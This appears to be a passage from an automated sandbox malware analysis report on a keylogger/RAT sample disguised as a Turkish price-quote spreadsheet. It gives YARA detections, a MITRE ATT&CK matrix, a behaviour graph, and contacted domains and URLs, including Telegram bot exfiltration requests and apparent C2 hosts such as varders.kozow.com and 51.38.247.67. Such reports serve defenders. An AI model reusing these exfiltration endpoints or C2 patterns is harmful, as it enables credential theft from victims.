                    Source: Yara matchFile source: 00000007.00000002.4495336578.0000000002EAC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000004.00000002.4496902509.0000000002B1A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000006.00000002.2272906135.000000000380B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000002.4490634067.000000000043A000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.2060044742.000000000438E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000002.2175629104.000000000446B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.2060044742.00000000041D9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.2043823101.00000000031D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000002.4496377708.0000000002B89000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe PID: 6544, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 3228, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: Tojeiuai.exe PID: 7104, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 5480, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 3772, type: MEMORYSTR

                    Remote Access Functionality

                    barindex
                    Yara detected MassLogger RAT
                    Source: Yara matchFile source: 00000002.00000002.4490634067.0000000000431000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Yara detected Snake Keylogger
                    Source: Yara matchFile source: 00000007.00000002.4495336578.0000000002DA1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000004.00000002.4496902509.0000000002A11000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000002.4490634067.0000000000431000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000002.4496377708.0000000002A81000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Yara detected Telegram RAT
                    Source: Yara matchFile source: 3.2.Tojeiuai.exe.43e7d70.8.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.438e6a0.6.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.43d48e0.5.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.43d48e0.5.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 3.2.Tojeiuai.exe.43e7d70.8.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000003.00000002.2175629104.00000000043E7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000006.00000002.2272906135.000000000380B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.2060044742.000000000438E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000002.2175629104.000000000446B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.2060044742.00000000041D9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe PID: 6544, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 3228, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: Tojeiuai.exe PID: 7104, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 5480, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 3772, type: MEMORYSTR
                    Yara detected VIP Keylogger
                    Source: Yara matchFile source: 7.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 3.2.Tojeiuai.exe.43e7d70.8.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.438e6a0.6.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.43d48e0.5.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.43d48e0.5.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 3.2.Tojeiuai.exe.43e7d70.8.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000003.00000002.2175629104.00000000043E7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000007.00000002.4490630405.0000000000435000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000004.00000002.4490658108.0000000000434000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000006.00000002.2272906135.000000000380B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.2060044742.000000000438E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000002.2175629104.000000000446B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.2060044742.00000000041D9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe PID: 6544, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: Tojeiuai.exe PID: 7104, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 5480, type: MEMORYSTR

                    Mitre Att&ck Matrix

                    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                    Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
                    Native API                    		1
                    DLL Side-Loading                    		1
                    DLL Side-Loading                    		1
                    Disable or Modify Tools                    		1
                    OS Credential Dumping                    		13
                    System Information Discovery                    		Remote Services11
                    Archive Collected Data                    		1
                    Web Service                    		Exfiltration Over Other Network MediumAbuse Accessibility Features
                    CredentialsDomainsDefault Accounts1
                    Scheduled Task/Job                    		1
                    Scheduled Task/Job                    		211
                    Process Injection                    		1
                    Deobfuscate/Decode Files or Information                    		1
                    Input Capture                    		211
                    Security Software Discovery                    		Remote Desktop Protocol1
                    Data from Local System                    		3
                    Ingress Tool Transfer                    		Exfiltration Over BluetoothNetwork Denial of Service
                    Email AddressesDNS ServerDomain AccountsAt1
                    Registry Run Keys / Startup Folder                    		1
                    Scheduled Task/Job                    		2
                    Obfuscated Files or Information                    		Security Account Manager1
                    Process Discovery                    		SMB/Windows Admin Shares1
                    Screen Capture                    		11
                    Encrypted Channel                    		Automated ExfiltrationData Encrypted for Impact
                    Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook1
                    Registry Run Keys / Startup Folder                    		1
                    Software Packing                    		NTDS31
                    Virtualization/Sandbox Evasion                    		Distributed Component Object Model1
                    Email Collection                    		3
                    Non-Application Layer Protocol                    		Traffic DuplicationData Destruction
                    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                    DLL Side-Loading                    		LSA Secrets1
                    Application Window Discovery                    		SSH1
                    Input Capture                    		14
                    Application Layer Protocol                    		Scheduled TransferData Encrypted for Impact
                    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                    Masquerading                    		Cached Domain Credentials1
                    System Network Configuration Discovery                    		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items31
                    Virtualization/Sandbox Evasion                    		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                    Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job211
                    Process Injection                    		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

                    Behavior Graph

                    Hide Legend

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet
                    behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1528904 Sample: TEKL#U0130F TALEP VE F#U013... Startdate: 08/10/2024 Architecture: WINDOWS Score: 100 27 reallyfreegeoip.org 2->27 29 api.telegram.org 2->29 31 2 other IPs or domains 2->31 43 Multi AV Scanner detection for domain / URL 2->43 45 Found malware configuration 2->45 47 Malicious sample detected (through community Yara rule) 2->47 53 14 other signatures 2->53 7 TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe 1 4 2->7         started        11 Tojeiuai.exe 2 2->11         started        13 Tojeiuai.exe 2 2->13         started        signatures3 49 Tries to detect the country of the analysis system (by using the IP) 27->49 51 Uses the Telegram API (likely for C&C communication) 29->51 process4 file5 23 C:\Users\user\AppData\Roaming\Tojeiuai.exe, PE32 7->23 dropped 25 C:\Users\...\Tojeiuai.exe:Zone.Identifier, ASCII 7->25 dropped 55 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 7->55 57 Writes to foreign memory regions 7->57 59 Injects a PE file into a foreign processes 7->59 15 InstallUtil.exe 15 2 7->15         started        61 Multi AV Scanner detection for dropped file 11->61 63 Machine Learning detection for dropped file 11->63 19 InstallUtil.exe 2 11->19         started        21 InstallUtil.exe 13->21         started        signatures6 process7 dnsIp8 33 api.telegram.org 149.154.167.220, 443, 49778, 49811 TELEGRAMRU United Kingdom 15->33 35 reallyfreegeoip.org 188.114.97.3, 443, 49705, 49706 CLOUDFLARENETUS European Union 15->35 37 checkip.dyndns.com 158.101.44.242, 49704, 49707, 49709 ORACLE-BMC-31898US United States 15->37 39 Tries to steal Mail credentials (via file / registry access) 21->39 41 Tries to harvest and steal browser information (history, passwords, etc) 21->41 signatures9

                    Screenshots

                    Thumbnails

                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                    windows-stand

                    Antivirus, Machine Learning and Genetic Malware Detection

                    Initial Sample

                    SourceDetectionScannerLabelLink
                    TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe34%ReversingLabsByteCode-MSIL.Trojan.Zilla
                    TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe42%VirustotalBrowse
                    TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe100%Joe Sandbox ML

                    Dropped Files

                    SourceDetectionScannerLabelLink
                    C:\Users\user\AppData\Roaming\Tojeiuai.exe100%Joe Sandbox ML
                    C:\Users\user\AppData\Roaming\Tojeiuai.exe34%ReversingLabsByteCode-MSIL.Trojan.Zilla
                    C:\Users\user\AppData\Roaming\Tojeiuai.exe42%VirustotalBrowse

                    Unpacked PE Files

                    No Antivirus matches

                    Domains

                    SourceDetectionScannerLabelLink
                    reallyfreegeoip.org0%VirustotalBrowse
                    api.telegram.org2%VirustotalBrowse
                    checkip.dyndns.com0%VirustotalBrowse
                    checkip.dyndns.org0%VirustotalBrowse

                    URLs

                    SourceDetectionScannerLabelLink
                    https://duckduckgo.com/chrome_newtab0%URL Reputationsafe
                    https://duckduckgo.com/ac/?q=0%URL Reputationsafe
                    https://stackoverflow.com/q/14436606/233540%URL Reputationsafe
                    https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0%URL Reputationsafe
                    http://checkip.dyndns.org0%URL Reputationsafe
                    https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=0%URL Reputationsafe
                    https://reallyfreegeoip.org/xml/8.46.123.330%URL Reputationsafe
                    https://www.ecosia.org/newtab/0%URL Reputationsafe
                    https://ac.ecosia.org/autocomplete?q=0%URL Reputationsafe
                    http://checkip.dyndns.org/0%URL Reputationsafe
                    https://reallyfreegeoip.org/xml/8.46.123.33$0%URL Reputationsafe
                    https://stackoverflow.com/q/11564914/23354;0%URL Reputationsafe
                    https://stackoverflow.com/q/2152978/233540%URL Reputationsafe
                    https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search0%URL Reputationsafe
                    http://checkip.dyndns.org/q0%URL Reputationsafe
                    https://reallyfreegeoip.org0%URL Reputationsafe
                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
                    https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=0%URL Reputationsafe
                    https://reallyfreegeoip.org/xml/0%URL Reputationsafe
                    https://github.com/mgravell/protobuf-netJ0%VirustotalBrowse
                    https://api.telegram.org1%VirustotalBrowse
                    https://api.telegram.org/bot4%VirustotalBrowse
                    https://www.google.com/images/branding/product/ico/googleg_lodp.ico0%VirustotalBrowse
                    https://www.office.com/0%VirustotalBrowse
                    https://github.com/mgravell/protobuf-net0%VirustotalBrowse
                    https://www.office.com/lB0%VirustotalBrowse
                    https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:965969%0D%0ADate%20a2%VirustotalBrowse
                    https://api.telegram.org/bot/sendMessage?chat_id=&text=2%VirustotalBrowse
                    https://chrome.google.com/webstore?hl=en0%VirustotalBrowse
                    http://anotherarmy.dns.army:808118%VirustotalBrowse
                    http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded7%VirustotalBrowse
                    http://aborters.duckdns.org:808114%VirustotalBrowse
                    https://github.com/mgravell/protobuf-neti0%VirustotalBrowse
                    http://varders.kozow.com:808115%VirustotalBrowse

                    Domains and IPs

                    Contacted Domains

                    NameIPActiveMaliciousAntivirus DetectionReputation
                    reallyfreegeoip.org
                    		188.114.97.3
                    		truetrueunknown
                    api.telegram.org
                    		149.154.167.220
                    		truetrueunknown
                    checkip.dyndns.com
                    		158.101.44.242
                    		truefalseunknown
                    checkip.dyndns.org
                    		unknown
                    		unknowntrueunknown

                    Contacted URLs

                    NameMaliciousAntivirus DetectionReputation
                    https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:965969%0D%0ADate%20and%20Time:%2009/10/2024%20/%2013:20:41%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20965969%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5Dfalse
                      		unknown
                      https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:965969%0D%0ADate%20and%20Time:%2008/10/2024%20/%2019:29:28%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20965969%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5Dfalse
                        		unknown
                        https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:965969%0D%0ADate%20and%20Time:%2008/10/2024%20/%2022:25:56%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20965969%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5Dfalse
                          		unknown
                          https://reallyfreegeoip.org/xml/8.46.123.33false
                          • URL Reputation: safe
                          		unknown
                          http://checkip.dyndns.org/false
                          • URL Reputation: safe
                          		unknown

                          URLs from Memory and Binaries

                          NameSourceMaliciousAntivirus DetectionReputation
                          https://www.office.com/InstallUtil.exe, 00000007.00000002.4495336578.0000000002F85000.00000004.00000800.00020000.00000000.sdmpfalseunknown
                          https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:965969%0D%0ADate%20aInstallUtil.exe, 00000002.00000002.4496377708.0000000002B67000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.4496902509.0000000002AF7000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.4495336578.0000000002E87000.00000004.00000800.00020000.00000000.sdmpfalseunknown
                          https://duckduckgo.com/chrome_newtabInstallUtil.exe, 00000007.00000002.4508776850.0000000003DC1000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          https://duckduckgo.com/ac/?q=InstallUtil.exe, 00000007.00000002.4508776850.0000000003DC1000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          https://stackoverflow.com/q/14436606/23354TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000000.00000002.2061637141.00000000057F0000.00000004.08000000.00040000.00000000.sdmp, TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000000.00000002.2060044742.000000000438E000.00000004.00000800.00020000.00000000.sdmp, TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000000.00000002.2043823101.00000000031D1000.00000004.00000800.00020000.00000000.sdmp, TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000000.00000002.2060044742.00000000041D9000.00000004.00000800.00020000.00000000.sdmp, Tojeiuai.exe, 00000003.00000002.2164548814.0000000003391000.00000004.00000800.00020000.00000000.sdmp, Tojeiuai.exe, 00000006.00000002.2251979049.00000000027FB000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          https://api.telegram.orgInstallUtil.exe, 00000002.00000002.4496377708.0000000002B67000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.4496902509.0000000002AF7000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.4495336578.0000000002E87000.00000004.00000800.00020000.00000000.sdmpfalseunknown
                          https://github.com/mgravell/protobuf-netJTEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000000.00000002.2061637141.00000000057F0000.00000004.08000000.00040000.00000000.sdmp, TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000000.00000002.2060044742.000000000438E000.00000004.00000800.00020000.00000000.sdmp, TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000000.00000002.2060044742.00000000041D9000.00000004.00000800.00020000.00000000.sdmpfalseunknown
                          https://www.google.com/images/branding/product/ico/googleg_lodp.icoInstallUtil.exe, 00000007.00000002.4508776850.0000000003DC1000.00000004.00000800.00020000.00000000.sdmpfalseunknown
                          https://api.telegram.org/botTEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000000.00000002.2060044742.000000000438E000.00000004.00000800.00020000.00000000.sdmp, TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000000.00000002.2060044742.00000000041D9000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.4496377708.0000000002B67000.00000004.00000800.00020000.00000000.sdmp, Tojeiuai.exe, 00000003.00000002.2175629104.00000000043E7000.00000004.00000800.00020000.00000000.sdmp, Tojeiuai.exe, 00000003.00000002.2175629104.000000000446B000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.4496902509.0000000002AF7000.00000004.00000800.00020000.00000000.sdmp, Tojeiuai.exe, 00000006.00000002.2272906135.000000000380B000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.4495336578.0000000002E87000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.4490630405.0000000000435000.00000040.00000400.00020000.00000000.sdmpfalseunknown
                          https://www.office.com/lBInstallUtil.exe, 00000002.00000002.4496377708.0000000002C6E000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.4496902509.0000000002BFD000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.4495336578.0000000002F8F000.00000004.00000800.00020000.00000000.sdmpfalseunknown
                          https://github.com/mgravell/protobuf-netTEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000000.00000002.2061637141.00000000057F0000.00000004.08000000.00040000.00000000.sdmp, TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000000.00000002.2060044742.000000000438E000.00000004.00000800.00020000.00000000.sdmp, TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000000.00000002.2060044742.00000000041D9000.00000004.00000800.00020000.00000000.sdmpfalseunknown
                          https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=InstallUtil.exe, 00000007.00000002.4508776850.0000000003DC1000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          http://checkip.dyndns.orgInstallUtil.exe, 00000002.00000002.4496377708.0000000002A81000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.4496902509.0000000002A11000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.4495336578.0000000002DA1000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=InstallUtil.exe, 00000002.00000002.4509339430.0000000003AA3000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.4509605645.0000000003A33000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.4508776850.0000000003DC1000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          https://api.telegram.org/bot/sendMessage?chat_id=&text=InstallUtil.exe, 00000002.00000002.4496377708.0000000002B67000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.4496902509.0000000002AF7000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.4495336578.0000000002E87000.00000004.00000800.00020000.00000000.sdmpfalseunknown
                          https://chrome.google.com/webstore?hl=enInstallUtil.exe, 00000007.00000002.4495336578.0000000002F54000.00000004.00000800.00020000.00000000.sdmpfalseunknown
                          https://www.ecosia.org/newtab/InstallUtil.exe, 00000002.00000002.4509339430.0000000003AA3000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.4509605645.0000000003A33000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.4508776850.0000000003DC1000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          http://varders.kozow.com:8081TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000000.00000002.2060044742.000000000438E000.00000004.00000800.00020000.00000000.sdmp, TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000000.00000002.2060044742.00000000041D9000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.4490634067.0000000000431000.00000040.00000400.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.4496377708.0000000002A81000.00000004.00000800.00020000.00000000.sdmp, Tojeiuai.exe, 00000003.00000002.2175629104.00000000043E7000.00000004.00000800.00020000.00000000.sdmp, Tojeiuai.exe, 00000003.00000002.2175629104.000000000446B000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.4496902509.0000000002A11000.00000004.00000800.00020000.00000000.sdmp, Tojeiuai.exe, 00000006.00000002.2272906135.000000000380B000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.4495336578.0000000002DA1000.00000004.00000800.00020000.00000000.sdmpfalseunknown
                          http://aborters.duckdns.org:8081TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000000.00000002.2060044742.000000000438E000.00000004.00000800.00020000.00000000.sdmp, TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000000.00000002.2060044742.00000000041D9000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.4490634067.0000000000431000.00000040.00000400.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.4496377708.0000000002A81000.00000004.00000800.00020000.00000000.sdmp, Tojeiuai.exe, 00000003.00000002.2175629104.00000000043E7000.00000004.00000800.00020000.00000000.sdmp, Tojeiuai.exe, 00000003.00000002.2175629104.000000000446B000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.4496902509.0000000002A11000.00000004.00000800.00020000.00000000.sdmp, Tojeiuai.exe, 00000006.00000002.2272906135.000000000380B000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.4495336578.0000000002DA1000.00000004.00000800.00020000.00000000.sdmpfalseunknown
                          https://ac.ecosia.org/autocomplete?q=InstallUtil.exe, 00000002.00000002.4509339430.0000000003AA3000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.4509605645.0000000003A33000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.4508776850.0000000003DC1000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          https://github.com/mgravell/protobuf-netiTEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000000.00000002.2061637141.00000000057F0000.00000004.08000000.00040000.00000000.sdmp, TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000000.00000002.2060044742.000000000438E000.00000004.00000800.00020000.00000000.sdmp, TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000000.00000002.2060044742.00000000041D9000.00000004.00000800.00020000.00000000.sdmpfalseunknown
                          https://reallyfreegeoip.org/xml/8.46.123.33$InstallUtil.exe, 00000002.00000002.4496377708.0000000002B40000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.4496377708.0000000002B67000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.4496377708.0000000002AFA000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.4496902509.0000000002A8A000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.4496902509.0000000002AD0000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.4496902509.0000000002AF7000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.4495336578.0000000002E87000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.4495336578.0000000002E1A000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.4495336578.0000000002E60000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          http://anotherarmy.dns.army:8081TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000000.00000002.2060044742.000000000438E000.00000004.00000800.00020000.00000000.sdmp, TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000000.00000002.2060044742.00000000041D9000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.4490634067.0000000000431000.00000040.00000400.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.4496377708.0000000002A81000.00000004.00000800.00020000.00000000.sdmp, Tojeiuai.exe, 00000003.00000002.2175629104.00000000043E7000.00000004.00000800.00020000.00000000.sdmp, Tojeiuai.exe, 00000003.00000002.2175629104.000000000446B000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.4496902509.0000000002A11000.00000004.00000800.00020000.00000000.sdmp, Tojeiuai.exe, 00000006.00000002.2272906135.000000000380B000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.4495336578.0000000002DA1000.00000004.00000800.00020000.00000000.sdmpfalseunknown
